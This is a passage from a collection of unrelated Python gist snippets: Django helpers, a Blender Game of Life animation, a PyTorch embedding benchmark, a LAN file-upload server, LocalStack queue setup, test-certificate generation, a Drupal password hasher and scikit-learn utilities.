def GET(self):
pass
if __name__ == "__main__":
app.run()
```
#### File: hard-gists/1823320/snippet.py
```python
from registration.signals import user_activated
from django.contrib.auth import login, authenticate
def login_on_activation(sender, user, request, **kwargs):
"""Logs in the user after activation"""
user.backend = 'django.contrib.auth.backends.ModelBackend'
login(request, user)
# Registers the function with the django-registration user_activated signal
user_activated.connect(login_on_activation)
```
#### File: hard-gists/1928063/snippet.py
```python
from django import template
register = template.Library()
@register.tag
def capture(parser, token):
nodelist = parser.parse(('endcapture',))
parser.delete_first_token()
varname = token.contents.split()[1]
return CaptureNode(nodelist, varname)
class CaptureNode(template.Node):
def __init__(self, nodelist, varname):
self.nodelist = nodelist
self.varname = varname
def render(self, context):
context[self.varname] = self.nodelist.render(context)
return ''
```
#### File: hard-gists/19284bd220165758a0c953ae25108b6b/snippet.py
```python
import bpy
import sys
from mathutils import Vector
import numpy as np
class ConwayGOL_2D:
def __init__(self, N):
"""
2D Conway Game of Life
:param N: grid side size (resulting grid will be a NxN matrix)
"""
self.N = N
self.grid = np.random.choice(2, (N,N))
def update(self):
"""
Update status of the grid
"""
tmpGrid = self.grid.copy()
for i in range(self.N):
for j in range(self.N):
neighbours = self.grid[max(0, i-1):min(i+2,self.N),max(0, j-1):min(j+2,self.N)].sum()
neighbours -= self.grid[i, j]
if self.grid[i, j] == 1:
if neighbours > 3 or neighbours < 2:
tmpGrid[i, j] = 0
elif neighbours == 3:
tmpGrid[i, j] = 1
self.grid = tmpGrid
#######################################
# GENERATORS #
#######################################
# generate and add an object with given properties to the scene
def suzanne_generator(size, x, y, z):
bpy.ops.mesh.primitive_monkey_add(
radius = size,
location = (x*2, y*2, z))
def cube_generator(cube_side, x, y, z):
bpy.ops.mesh.primitive_cube_add(
radius = cube_side,
location = (x*2, y*2, z))
def icosphere_generator(size, subdivisions, x, y, z):
bpy.ops.mesh.primitive_ico_sphere_add(
subdivisions = subdivisions,
size = size,
location = (x*2, y*2, z))
#######################################
# UPDATERS #
#######################################
# define behavior for a Blender object based on gol grid value
# Hides object (both view and render)
def object_updater_hide(obj, grid_val, keyframe=True):
obj.hide = not grid_val
obj.hide_render = obj.hide
if keyframe:
obj.keyframe_insert("hide")
obj.keyframe_insert("hide_render")
# shrink object when grid values is zero
def object_updater_scale(obj, grid_val, scale_factor=0.8, keyframe=True):
origin_scale = Vector((1.0, 1.0, 1.0))
# grid value 1, object should end up with original size
if grid_val:
# skip all (keyframing too) if already ok, otherwise set original size
if obj.scale == origin_scale:
return
else:
obj.scale = origin_scale
# grid value 0, object should end up scaled
else:
# skip all (keyframing too) if already ok, otherwise set scaled size
if obj.scale == origin_scale*scale_factor:
return
else:
obj.scale = origin_scale*scale_factor
if keyframe:
obj.keyframe_insert("scale")
#######################################
# UTIL METHODS #
#######################################
# create grid of objects on current scene
# The object generator is responsible for the creation of a single object instance
def create_grid(gol, obj_generator):
obj_grid = []
for i in range(gol.N):
row = []
for j in range(gol.N):
obj_generator(i, j, 0)
row.append(bpy.context.scene.objects.active)
obj_grid.append(row)
return obj_grid
# update grid of Blender objects to reflect gol status, then update gol.
def update_grid(obj_grid, gol, obj_updater):
for i in range(gol.N):
for j in range(gol.N):
obj_updater(obj_grid[i][j], gol.grid[i, j])
gol.update()
# handler called at every frame change
def frame_handler(scene, grid, gol, obj_updater, num_frames_change):
frame = scene.frame_current
n = frame % num_frames_change
if n == 0:
update_grid(grid, gol, obj_updater)
# delete all objects of current scene (un-hide all hidden ones first)
def delete_all():
for obj in bpy.data.objects:
obj.hide = False
# select/delete only meshes
obj.select = obj.type == 'MESH'
bpy.ops.object.delete(use_global=True)
def main(_):
num_frames_change = 2
grid_side = 5
obj_size = 0.7
subdivisions = 10
scale_factor=0.2
#obj_generator = lambda x,y,z:icosphere_generator(obj_size, subdivisions, x, y, z)
obj_generator = lambda x,y,z:cube_generator(obj_size, x, y, z)
#obj_updater = object_updater_hide
obj_updater = lambda obj,grid:object_updater_scale(obj,grid, scale_factor=scale_factor)
delete_all()
gol = ConwayGOL_2D(grid_side)
obj_grid = create_grid(gol, obj_generator)
bpy.app.handlers.frame_change_pre.clear()
bpy.app.handlers.frame_change_pre.append(lambda x : frame_handler(x, obj_grid, gol,
obj_updater,
num_frames_change))
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: hard-gists/19a4b105d1dff9a591b8/snippet.py
```python
import execjs
import os
here = os.path.dirname(__file__)
node_modules = os.path.abspath(os.path.join(here, './node_modules'))
class Babel:
def __init__(self, *module_paths):
"""Constructor
:param module_paths: Paths to node_modules
"""
self.paths = module_paths
# This is used to let execjs know where the
# modules are
self.module_append_string = '\n'.join(
'module.paths.push("%s")\n' % p for p in self.paths
)
command_string = 'var babel = require("babel-core")'
self.babel = execjs.compile(self.module_append_string + command_string)
def transpile(self, code, options=None):
"""Takes code and runs it through babel.js
if ``options`` is not provided it'll default to:
.. code-block:: python
{'ast': false, 'presets': ['react', 'es2015']}
"""
if options is None:
options = {
'ast': False,
'presets': ['react', 'es2015'],
}
transpiled_code = self.babel.call(
'babel.transform', code, options
)['code']
return transpiled_code
class React:
def __init__(self, babel):
"""Constructor
:param babel: Instance of ``babel``.
"""
self.babel = babel
self.codes = []
def add_code(self, code):
"""Registers some code to be included
This registers a class to be included in the rendering context.
"""
self.codes.append(code)
def render_string(self, code):
"""Renders a string of JSX
This will take a JSX string and render it to HTML
"""
classes = '\n'.join(
'{0};'.format(code) for code in self.codes
)
# we don't use `es2015` preset here because it
# forces `use strict`
element_options = {'ast': False, 'presets': ['react']}
element = self.babel.transpile(code, element_options)
es6_code = """
import ReactDOMServer from "react-dom/server";
{0}
function __render() {{
var element = {1}
return ReactDOMServer.renderToString(element);
}};""".format(classes, element);
transpiled = self.babel.transpile(es6_code)
final_code = self.babel.module_append_string + transpiled
compiled = execjs.compile(final_code)
result = compiled.call('__render')
return result
babel = Babel(node_modules)
react = React(babel)
original_source = """
import React from "react";
class HelloWorld extends React.Component {
render() {
return <p>Hello, world!</p>;
}
}
"""
react.add_code(original_source)
print(react.render_string("<HelloWorld />"))
```
#### File: hard-gists/19d2397ff8da1952556cf2417d965f6c/snippet.py
```python
def make_monitor(running_mean_len):
def monitor(i,self,args):
if np.mean(self.oob_improvement_[max(0,i-running_mean_len+1):i+1])<0:
return True
else:
return False
return monitor
## Example use
from sklearn.ensemble import GradientBoostingRegressor
gbr = GradientBoostingRegressor(n_estimators=10000000,verbose=5) ## n_estimators can be arbitrarily high
monitor = make_monitor(10) ## this is a number that should be fit to a validation set
gbr.fit(X_train,y_train,monitor=monitor)
print gbr.estimators_.shape[0]
```
#### File: hard-gists/1cec2b3d8aeaaa102e3b/snippet.py
```python
import gtk, gobject
from subprocess import Popen
VOL_UP = 'amixer set Master 5%+' # command to set up
VOL_DOWN = 'amixer set Master 5%-' # command to set down
class SystrayIconApp:
def __init__(self):
self.tray = gtk.status_icon_new_from_icon_name('audio-volume-medium')
self.tray.connect('scroll-event', self.on_scroll)
self.tray.set_tooltip(('Volume tray app'))
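# Scrolling up/down over the tray icon raises or lowers the master volume.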
def on_scroll(self, icon, event):
if event.direction == gtk.gdk.SCROLL_UP:
Popen(VOL_UP.split(' '))
else:
Popen(VOL_DOWN.split(' '))
if __name__ == "__main__":
SystrayIconApp()
gtk.main()
```
#### File: hard-gists/1d7cb531bb8fff8c228b7710126bcc33/snippet.py
```python
import yaml
import sys
import json
import argparse
from subprocess import Popen, PIPE
import argparse
import os
exists=os.path.isfile
def json_serial(obj):
# all obj's dumped to str
return str(obj)
# look for jq arguments, vs file arguments
offset=1
for arg in sys.argv[1:]:
if arg and arg[0] == '-' and not exists(arg):
offset += 1
else:
break
# construct arguments so that it looks like jq
files=[]
frm=[0]
index=offset
for arg in sys.argv[offset:]:
if exists(arg):
files.append(arg)
frm.insert(0,index)
index+=1
for index in frm:
sys.argv.pop(index)
if sys.argv:
# jq args are present
args=["jq"]+sys.argv
pipe = Popen(args, stdin=PIPE).stdin
else:
# no jq args... just dump to stdout
pipe = sys.stdout
if files:
for fin in files:
json.dump(yaml.load(open(fin)),pipe,default=json_serial)
else:
json.dump(yaml.load(sys.stdin),pipe,default=json_serial)
```
#### File: hard-gists/1e7c18c6f6eda87f1cb4995b0e6a22a5/snippet.py
```python
import argparse
from collections import Counter
import csv
import os
import torch
from torch.autograd import Variable
import torch.nn as nn
import torch.optim as optim
import torch.utils.data as data
import tarfile
import time
import urllib.request
'''
This trains a classifier using Embedding -> tanh -> Linear -> CrossEntropyLoss
The goal is really just to get a sense of the speed of the Embedding layer in various cases,
there's not even any evaluation of the model :) (would be easy to add though)
$ python demo.py
$ python demo.py --sparse
$ python demo.py --cuda
$ python demo.py --cuda --sparse
'''
parser = argparse.ArgumentParser()
parser.add_argument('--cuda', action='store_true', help='use CUDA')
parser.add_argument('--sparse', action='store_true', help='use sparse updates for embedding layer')
parser.add_argument('--nepochs', type=int, default=10, help='number of epochs')
parser.add_argument('--ntoken', type=int, default=1000000, help='maximum dictionary size')
parser.add_argument('--nhid', type=int, default=100, help='hidden layer size')
parser.add_argument('--batch-size', type=int, default=100, help='batch size')
opt = parser.parse_args()
nclasses = 14
url = 'https://github.com/le-scientifique/torchDatasets/raw/master/dbpedia_csv.tar.gz'
base_folder = '/tmp'
archive_folder = os.path.join(base_folder, 'dbpedia_csv')
train_file = os.path.join(archive_folder, 'train.csv')
test_file = os.path.join(archive_folder, 'test.csv')
Tensor = torch.cuda.FloatTensor if opt.cuda else torch.Tensor
class Dataset(data.Dataset):
def __init__(self, dictionary, filepath):
lengths = []
indices = []
targets = []
with open(filepath, 'r') as fin:
for row in csv.reader(fin):
tokens = [i for i in [dictionary.get(x) for x in (row[1] + row[2]).split()] if i is not None]
length = len(tokens)
targets.append(int(row[0]) - 1)
lengths.append(len(tokens))
indices.extend(tokens)
self.targets = torch.LongTensor(targets)
self.lengths = torch.LongTensor(lengths)
self.starts = self.lengths.cumsum(0) - self.lengths
self.indices = torch.LongTensor(indices)
def __getitem__(self, index):
start = self.starts[index]
length = self.lengths[index]
indices = self.indices[start:start + length] if length > 0 else None
return length, indices, self.targets[index]
def __len__(self):
return self.lengths.numel()
class Model(nn.Module):
def __init__(self, ntoken, nhid, nclasses):
super(Model, self).__init__()
self.embedding = nn.Embedding(opt.ntoken, opt.nhid, sparse=opt.sparse)
self.linear = nn.Linear(opt.nhid, nclasses)
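# Average each example's token embeddings, apply tanh, then the linear classifier.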
def forward(self, lengths, indices):
embeddings = Variable(Tensor(lengths.numel(), opt.nhid))
starts = lengths.data.cumsum(0) - lengths.data
for i, length in enumerate(lengths.data):
if length > 0:
start = starts[i]
embeddings[i] = self.embedding(indices[start:start + length]).sum(dim=0).squeeze(0) / length
else:
embeddings[i] = torch.zeros(opt.nhid)
return self.linear(embeddings.tanh())
def collate(batch):
lengths = torch.LongTensor([x[0] for x in batch])
indices = torch.cat([x[1] for x in batch if x[1] is not None])
targets = torch.LongTensor([x[2] for x in batch])
return lengths, indices, targets
def load_dictionary(filepath):
cnt = Counter()
with open(filepath, 'r') as fin:
for row in csv.reader(fin):
for token in (row[1] + row[2]).split():
cnt[token] += 1
return {e: i for i, (e, _) in enumerate(cnt.most_common(opt.ntoken))}
print('Downloading dataset')
if not os.path.exists(archive_folder):
with urllib.request.urlopen(url, timeout=15) as stream, \
tarfile.open(fileobj=stream, mode='r|gz') as tf:
tf.extractall(base_folder)
print('Initializing model')
model = Model(opt.ntoken, opt.nhid, nclasses)
if opt.cuda:
model.cuda()
print('Building dictionary')
dictionary = load_dictionary(train_file)
print('Loading dataset')
train_data = Dataset(dictionary, train_file)
train_dataloader = data.DataLoader(train_data, batch_size=opt.batch_size, shuffle=True, collate_fn=collate)
# test_data = Dataset(dictionary, test_file)
# test_dataloader = data.DataLoader(test_data, batch_size=opt.batch_size, collate_fn=collate)
criterion = nn.CrossEntropyLoss()
optimizer = optim.Adagrad(model.parameters(), lr=0.1)
start_time = time.time()
total_batches = 0
print('Training')
for i in range(opt.nepochs):
for j, inputs in enumerate(train_dataloader):
optimizer.zero_grad()
lengths, indices, targets = [Variable(x.cuda() if opt.cuda else x) for x in inputs]
probs = model(lengths, indices)
loss = criterion(probs, targets)
loss.backward()
optimizer.step()
total_batches += 1
print('epoch: {}, batches: {}/{}, loss: {}, time/batch: {}'.format(
i + 1, j + 1, len(train_dataloader), loss.data[0], (time.time() - start_time) / total_batches))
```
#### File: hard-gists/1e7e3c1da32d00f8ce0dff6b86fd45fe/snippet.py
```python
import os
import html
import urllib
import sys
import http
import cgi
import socket
import socketserver
import mimetypes
from io import BytesIO
from http import HTTPStatus
from http.server import HTTPServer
from http.server import SimpleHTTPRequestHandler
import netifaces as ni
__version__ = "0.8"
class UploadHTTPHandler(SimpleHTTPRequestHandler):
server_version = "SimpleHTTP/" + __version__
def do_POST(self):
"""Serve a POST request."""
form = cgi.FieldStorage(
fp=self.rfile,
headers=self.headers,
environ={'REQUEST_METHOD': 'POST',
'CONTENT_TYPE': self.headers['Content-Type'],
})
filename = form['file'].filename
path = self.translate_path(self.path)
filepath = os.path.join(path, filename)
if os.path.exists(filepath):
self.log_error('File %s exist!', filename)
filepath += '.new'
with open(filepath, 'wb') as f:
f.write(form['file'].value)
super().do_GET()
def list_directory(self, path):
try:
list = os.listdir(path)
except OSError:
self.send_error(
HTTPStatus.NOT_FOUND,
"No permission to list directory")
return None
list.sort(key=lambda a: a.lower())
r = []
try:
displaypath = urllib.parse.unquote(self.path,
errors='surrogatepass')
except UnicodeDecodeError:
displaypath = urllib.parse.unquote(path)
displaypath = html.escape(displaypath)
enc = sys.getfilesystemencoding()
title = 'Directory listing for %s' % displaypath
r.append('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">')
r.append('<html>\n<head>')
r.append('<meta http-equiv="Content-Type" '
'content="text/html; charset=%s">' % enc)
r.append('<title>%s</title>\n</head>' % title)
r.append('<body>\n<h1>%s</h1>' % title)
r.append('''<form action="" enctype="multipart/form-data" method="post">\n
<input name="file" type="file" />
<input value="upload" type="submit" />
</form>''')
r.append('<hr>\n<ul>')
for name in list:
fullname = os.path.join(path, name)
displayname = linkname = name
# Append / for directories or @ for symbolic links
if os.path.isdir(fullname):
displayname = name + "/"
linkname = name + "/"
if os.path.islink(fullname):
displayname = name + "@"
# Note: a link to a directory displays with @ and links with /
r.append('<li><a href="%s">%s</a></li>'
% (urllib.parse.quote(linkname,
errors='surrogatepass'),
html.escape(displayname)))
r.append('</ul>\n<hr>\n</body>\n</html>\n')
encoded = '\n'.join(r).encode(enc, 'surrogateescape')
f = BytesIO()
f.write(encoded)
f.seek(0)
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", "text/html; charset=%s" % enc)
self.send_header("Content-Length", str(len(encoded)))
self.end_headers()
return f
if not mimetypes.inited:
mimetypes.init() # try to read system mime.types
extensions_map = mimetypes.types_map.copy()
extensions_map.update({
'': 'application/octet-stream', # Default
'.py': 'text/plain',
'.c': 'text/plain',
'.h': 'text/plain',
})
def get_httpd(port):
Handler = http.server.SimpleHTTPRequestHandler
httpd = socketserver.TCPServer(("", port), Handler)
return httpd
def get_wirelessip(interf):
try:
wirelessip = ni.ifaddresses(interf)[ni.AF_INET][0]['addr']
except:
wirelessip = get_ip_address()
return wirelessip
def get_ip_address():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.connect(("8.8.8.8", 80))
return s.getsockname()[0]
def show_qr(url):
cmd = "echo {} | qrencode -o - -t UTF8".format(url)
os.system(cmd)
if __name__ == '__main__':
#"""with upload
if len(sys.argv) == 3:
webdir=sys.argv[1]
port=int(sys.argv[2])
os.chdir(webdir)
UploadHTTPHandler.protocol_version = "HTTP/1.0"
wirelessip = get_wirelessip("en0")
server_address = (wirelessip, port)
httpd = HTTPServer(server_address, UploadHTTPHandler)
sa = httpd.socket.getsockname()
url = "http://{}:{}".format(sa[0], sa[1])
show_qr(url)
print(" | Serving HTTP on {}".format(url))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\nKeyboard interrupt received, exiting.")
httpd.server_close()
sys.exit(0)
else:
print ("Usage:\n\t{} WEB_DIR PORT".format(sys.argv[0]))
"""wo upload
if len(sys.argv) == 3:
WEB_DIR=sys.argv[1]
port=int(sys.argv[2])
os.chdir(WEB_DIR)
wirelessip = get_wirelessip("en0")
httpd = get_httpd(port)
url = "http://{}:{}".format(wirelessip, port)
show_qr(url)
print (" | Serving at {}".format(url))
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("\n | Keyboard interrupt received, exiting.")
httpd.server_close()
sys.exit(0)
else:
print ("Usage:\n\t{} WEB_DIR PORT".format(sys.argv[0]))
"""
```
#### File: hard-gists/1ed9763ab4aa98516a7d/snippet.py
```python
from optparse import make_option
from django.core import serializers
from django.db.models import get_app, get_models
__author__ = 'mikhailturilin'
from django.core.management.base import BaseCommand
def get_foreign_key_fields(model):
for field in model._meta.fields:
if field.get_internal_type() == "ForeignKey":
yield field
def model_name(model):
return model._meta.object_name
def copy_instance(model, instance, from_database, to_database, ignore_errors=False, natural_key_models=None,
skip_models=None):
if model_name(model) in (skip_models or []):
return
use_natural_keys = model_name(model) in (natural_key_models or [])
if model.objects.using(to_database).filter(pk=instance.pk).exists():
# print "Skipping %s:%s" % (model.__name__, obj.pk)
return
print "Copying %s:%s" % (model.__name__, instance.pk)
# copy foreign keys
for fk_field in get_foreign_key_fields(model):
fk_obj = getattr(instance, fk_field.name, None)
if fk_obj:
copy_instance(fk_field.rel.to, fk_obj, from_database, to_database, ignore_errors)
# copy m2m keys
meta = model._meta
for m2m in meta.many_to_many:
# store many-to-many related objects for every
# many-to-many relation of this object
m2m_qs = getattr(instance, m2m.name)
foreign_objs = m2m_qs.all()
for m2m_obj in foreign_objs:
copy_instance(m2m.rel.to, m2m_obj, from_database, to_database, ignore_errors)
# copy itself
original_data_json = serializers.serialize("json", [instance], use_natural_keys=use_natural_keys)
print original_data_json
new_data = serializers.deserialize("json", original_data_json, using=to_database)
for n in new_data:
try:
n.save(using=to_database)
except Exception as ex:
if ignore_errors:
print ex
else:
raise ex
def copy_model(model, from_database, to_database, ignore_errors=False, natural_key_models=None, skip_models=None):
if model_name(model) in (skip_models or []):
print "Skipping model %s" % model_name(model)
return
count = model.objects.using(from_database).count()
print "%s objects in model %s" % (count, model_name(model))
for obj in model.objects.using(from_database).all():
copy_instance(model, obj, from_database, to_database, ignore_errors, natural_key_models, skip_models)
def flush_model(model, database):
print "deleting all models '%s' in database '%s'" % (model.__name__, database)
model.objects.using(database).delete()
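# Resolve an 'app' or 'app:ModelName' string into a list of model classes.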
def get_encoded_models(name):
model_name = None
if ':' in name:
app_name, model_name = name.split(':')
else:
app_name = name
app = get_app(app_name)
models = get_models(app)
if model_name:
models = [model for model in models if model._meta.object_name == model_name]
return models
class Command(BaseCommand):
args = '<from_database to_database application1, application2 ...>'
help = 'copies models between databases'
option_list = BaseCommand.option_list + (
make_option('--delete',
action='store_true',
dest='delete',
default=False,
help='Delete the models in the target db first'),
make_option('--ignore-errors',
action='store_true',
dest='ignore-errors',
default=False,
help='Ignore save errors, just show them in the output'),
make_option('--natural-key-models',
dest='natural-key-models',
default='',
help='List of the models names to use with natural key serialization'),
make_option('--skip-models',
dest='skip-models',
default='',
help='List of the models names to skip'),
)
def handle(self, from_database, to_database, *args, **options):
apps_names = args
skip_models = options['skip-models'].split(',')
natural_key_models = options['natural-key-models'].split(',')
if options['delete']:
for name in apps_names:
for model in get_encoded_models(name):
print "Clearing model '%s'" % model.__name__
flush_model(model, to_database)
for name in apps_names:
models = get_encoded_models(name)
for model in models:
# import pudb; pu.db
print "Copying model '%s'" % model.__name__
copy_model(model, from_database, to_database, ignore_errors=options['ignore-errors'],
natural_key_models=natural_key_models, skip_models=skip_models)
```
#### File: hard-gists/20d90e1f21792a67eb6d27c445aa7a1f/snippet.py
```python
import sys
import yaml
from subprocess import call
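# Expected YAML shape (inferred from how the keys are read below):
# Local:
#   Queues:
#     - Name: my-queue
#   Topics:
#     - Name: my-topic
#       Subscriptions:
#         - QueueName: my-queue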
def main():
f = open(sys.argv[1])
data = yaml.load(f)
create_queues(data['Local']['Queues'])
create_topics(data['Local']['Topics'])
print('All queues and topics created')
def create_queues(queues):
create_queue_command = 'aws --endpoint-url=http://localhost:4576 sqs create-queue --queue-name {}'
for queue in queues:
call(create_queue_command.format(queue['Name']), shell=True)
print('Queue {} created'.format(queue['Name']))
def create_topics(topics):
create_topic_command = 'aws --endpoint-url=http://localhost:4575 sns create-topic --name {}'
for topic in topics:
call(create_topic_command.format(topic['Name']), shell=True)
print('Topic {} created'.format(topic['Name']))
subscriptions = topic.get('Subscriptions', None)
if subscriptions:
for subscription in subscriptions:
subscribe_topic(topic, subscription)
def subscribe_topic(topic, subscription):
sns_arn = 'arn:aws:sns:us-east-1:123456789012:{}'.format(topic['Name'])
sqs_arn = 'arn:aws:sqs:us-east-1:123456789012:{}'.format(subscription['QueueName'])
create_subscription_command = 'aws --endpoint-url=http://localhost:4575 sns subscribe --topic-arn {} --protocol sqs --notification-endpoint {}'
call(create_subscription_command.format(sns_arn, sqs_arn), shell=True)
print('Queue {} subscribed to {}'.format(subscription['QueueName'], topic['Name']))
if __name__ == "__main__":
main()
```
#### File: hard-gists/2203822/snippet.py
```python
import sys
from PySide.QtCore import QObject, Slot
from PySide.QtGui import QApplication
from PySide.QtWebKit import QWebView
html = """
<html>
<body>
<h1>Hello!</h1><br>
<h2><a href="#" onclick="printer.text('Message from QWebView')">QObject Test</a></h2>
<h2><a href="#" onclick="alert('Javascript works!')">JS test</a></h2>
</body>
</html>
"""
class ConsolePrinter(QObject):
def __init__(self, parent=None):
super(ConsolePrinter, self).__init__(parent)
@Slot(str)
def text(self, message):
print message
if __name__ == '__main__':
app = QApplication(sys.argv)
view = QWebView()
frame = view.page().mainFrame()
printer = ConsolePrinter()
view.setHtml(html)
frame.addToJavaScriptWindowObject('printer', printer)
frame.evaluateJavaScript("alert('Hello');")
frame.evaluateJavaScript("printer.text('Goooooooooo!');")
view.show()
app.exec_()
```
#### File: hard-gists/2280363/snippet.py
```python
from pdfminer.pdfparser import PDFParser, PDFDocument
def parse(filename, maxlevel):
fp = open(filename, 'rb')
parser = PDFParser(fp)
doc = PDFDocument()
parser.set_document(doc)
doc.set_parser(parser)
outlines = doc.get_outlines()
for (level, title, dest, a, se) in outlines:
if level <= maxlevel:
print ' ' * level, title
if __name__ == '__main__':
import sys
if len(sys.argv) != 3:
print 'Usage: %s xxx.pdf level' % sys.argv[0]
sys.exit(2)
parse(sys.argv[1], int(sys.argv[2]))
```
#### File: hard-gists/2338529/snippet.py
```python
from tempfile import NamedTemporaryFile as namedtmp
import time
from M2Crypto import X509, EVP, RSA, ASN1
__author__ = '<EMAIL>'
__all__ = ['mk_temporary_cacert', 'mk_temporary_cert']
def mk_ca_issuer():
"""
Our default CA issuer name.
"""
issuer = X509.X509_Name()
issuer.C = "US"
issuer.CN = "ca_testing_server"
issuer.ST = 'CA'
issuer.L = 'San Francisco'
issuer.O = 'ca_yelp'
issuer.OU = 'ca_testing'
return issuer
def mk_cert_valid(cert, days=365):
"""
Make a cert valid from now and til 'days' from now.
Args:
cert -- cert to make valid
days -- number of days cert is valid for from now.
"""
t = long(time.time())
now = ASN1.ASN1_UTCTIME()
now.set_time(t)
expire = ASN1.ASN1_UTCTIME()
expire.set_time(t + days * 24 * 60 * 60)
cert.set_not_before(now)
cert.set_not_after(expire)
def mk_request(bits, cn='localhost'):
"""
Create a X509 request with the given number of bits in they key.
Args:
bits -- number of RSA key bits
cn -- common name in the request
Returns a X509 request and the private key (EVP)
"""
pk = EVP.PKey()
x = X509.Request()
rsa = RSA.gen_key(bits, 65537, lambda: None)
pk.assign_rsa(rsa)
x.set_pubkey(pk)
name = x.get_subject()
name.C = "US"
name.CN = cn
name.ST = 'CA'
name.O = 'yelp'
name.OU = 'testing'
x.sign(pk,'sha1')
return x, pk
def mk_cacert():
"""
Make a CA certificate.
Returns the certificate, private key and public key.
"""
req, pk = mk_request(1024)
pkey = req.get_pubkey()
cert = X509.X509()
cert.set_serial_number(1)
cert.set_version(2)
mk_cert_valid(cert)
cert.set_issuer(mk_ca_issuer())
cert.set_subject(cert.get_issuer())
cert.set_pubkey(pkey)
cert.add_ext(X509.new_extension('basicConstraints', 'CA:TRUE'))
cert.add_ext(X509.new_extension('subjectKeyIdentifier', cert.get_fingerprint()))
cert.sign(pk, 'sha1')
return cert, pk, pkey
def mk_cert():
"""
Make a certificate.
Returns a new cert.
"""
cert = X509.X509()
cert.set_serial_number(2)
cert.set_version(2)
mk_cert_valid(cert)
cert.add_ext(X509.new_extension('nsComment', 'SSL sever'))
return cert
def mk_casigned_cert():
"""
Create a CA cert + server cert + server private key.
"""
# unused, left for history.
cacert, pk1, _ = mk_cacert()
cert_req, pk2 = mk_request(1024, cn='testing_server')
cert = mk_cert()
cert.set_subject(cert_req.get_subject())
cert.set_pubkey(cert_req.get_pubkey())
cert.sign(pk1, 'sha1')
return cacert, cert, pk2
def mk_temporary_cacert():
"""
Create a temporary CA cert.
Returns a tuple of NamedTemporaryFiles holding the CA cert and private key.
"""
cacert, pk1, pkey = mk_cacert()
cacertf = namedtmp()
cacertf.write(cacert.as_pem())
cacertf.flush()
pk1f = namedtmp()
pk1f.write(pk1.as_pem(None))
pk1f.flush()
return cacertf, pk1f
def mk_temporary_cert(cacert_file, ca_key_file, cn):
"""
Create a temporary certificate signed by the given CA, and with the given common name.
If cacert_file and ca_key_file is None, the certificate will be self-signed.
Args:
cacert_file -- file containing the CA certificate
ca_key_file -- file containing the CA private key
cn -- desired common name
Returns a namedtemporary file with the certificate and private key
"""
cert_req, pk2 = mk_request(1024, cn=cn)
if cacert_file and ca_key_file:
cacert = X509.load_cert(cacert_file)
pk1 = EVP.load_key(ca_key_file)
else:
cacert = None
pk1 = None
cert = mk_cert()
cert.set_subject(cert_req.get_subject())
cert.set_pubkey(cert_req.get_pubkey())
if cacert and pk1:
cert.set_issuer(cacert.get_issuer())
cert.sign(pk1, 'sha1')
else:
cert.set_issuer(cert.get_subject())
cert.sign(pk2, 'sha1')
certf = namedtmp()
certf.write(cert.as_pem())
certf.write(pk2.as_pem(None))
certf.flush()
return certf
if __name__ == '__main__':
cacert, cert, pk = mk_casigned_cert()
with open('cacert.crt', 'w') as f:
f.write(cacert.as_pem())
with open('cert.crt', 'w') as f:
f.write(cert.as_pem())
f.write(pk.as_pem(None))
# Sanity checks...
cac = X509.load_cert('cacert.crt')
print cac.verify(), cac.check_ca()
cc = X509.load_cert('cert.crt')
print cc.verify(cac.get_pubkey())
# protips
# openssl verify -CAfile cacert.crt cacert.crt cert.crt
# openssl x509 -in cert.crt -noout -text
# openssl x509 -in cacert.crt -noout -text
```
#### File: hard-gists/2344345/snippet.py
```python
import hashlib
from django.contrib.auth.hashers import BasePasswordHasher
_ITOA64 = './0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
class DrupalPasswordHasher(BasePasswordHasher):
algorithm = "S"
iter_code = 'C'
salt_length = 8
def encode(self, password, salt, iter_code=None):
"""The Drupal 7 method of encoding passwords"""
if iter_code is None:
iter_code = self.iter_code
iterations = 2 ** _ITOA64.index(iter_code)
hash = hashlib.sha512(salt + password).digest()
for i in range(iterations):
hash = hashlib.sha512(hash + password).digest()
l = len(hash)
output = ''
i = 0
while i < l:
value = ord(hash[i])
i = i + 1
output += _ITOA64[value & 0x3f]
if i < l:
value |= ord(hash[i]) << 8
output += _ITOA64[(value >> 6) & 0x3f]
if i >= l:
break
i += 1
if i < l:
value |= ord(hash[i]) << 16
output += _ITOA64[(value >> 12) & 0x3f]
if i >= l:
break
i += 1
output += _ITOA64[(value >> 18) & 0x3f]
longhashed = "%s$%s%s%s" % (self.algorithm, iter_code,
salt, output)
return longhashed[:54]
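# Re-hash the candidate password with the salt and iteration code stored in the encoded value and compare.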
def verify(self, password, encoded):
hash = encoded.split("$")[1]
iter_code = hash[0]
salt = hash[1:1 + self.salt_length]
return encoded == self.encode(password, salt, iter_code)
```
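A minimal sketch of enabling this hasher in a Django project; the dotted path is an assumption and depends on where the class above is placed:
```python
# settings.py -- 'myproject.hashers' is a hypothetical module path for the class above
PASSWORD_HASHERS = (
    'myproject.hashers.DrupalPasswordHasher',
    'django.contrib.auth.hashers.PBKDF2PasswordHasher',
)
```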
#### File: hard-gists/2351057/snippet.py
```python
import numpy as np
from sklearn.linear_model.base import LinearModel
from sklearn.linear_model import LinearRegression, Lasso, lasso_path, lars_path
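# Nonnegative garrote: fit OLS, then shrink each coefficient by a nonnegative factor learned with a positivity-constrained Lasso.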
def non_negative_garotte(X, y, alpha, tol=0.001):
coef_ols = LinearRegression(fit_intercept=False).fit(X, y).coef_
X = X * coef_ols[np.newaxis, :]
shrink_coef = Lasso(alpha=alpha, fit_intercept=False,
positive=True, normalize=False,
tol=tol).fit(X, y).coef_
# Shrunken betas
coef = coef_ols * shrink_coef
# Residual Sum of Squares
rss = np.sum((y - np.dot(X, coef)) ** 2)
return coef, shrink_coef, rss
def non_negative_garotte_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
precompute='auto', **params):
coef_ols = LinearRegression(fit_intercept=False).fit(X, y).coef_
X = X * coef_ols[np.newaxis, :]
# Use lars_path even if it does not support positivity (much faster)
_, _, shrink_coef_path = lars_path(X, y, method='lasso')
# models = lasso_path(X, y, eps, n_alphas, alphas=None,
# precompute=precompute, Xy=None, fit_intercept=False,
# normalize=False, copy_X=True, verbose=False,
# **params)
#
# shrink_coef_path = np.array([m.coef_ for m in models]).T
coef_path = shrink_coef_path * coef_ols[:, None]
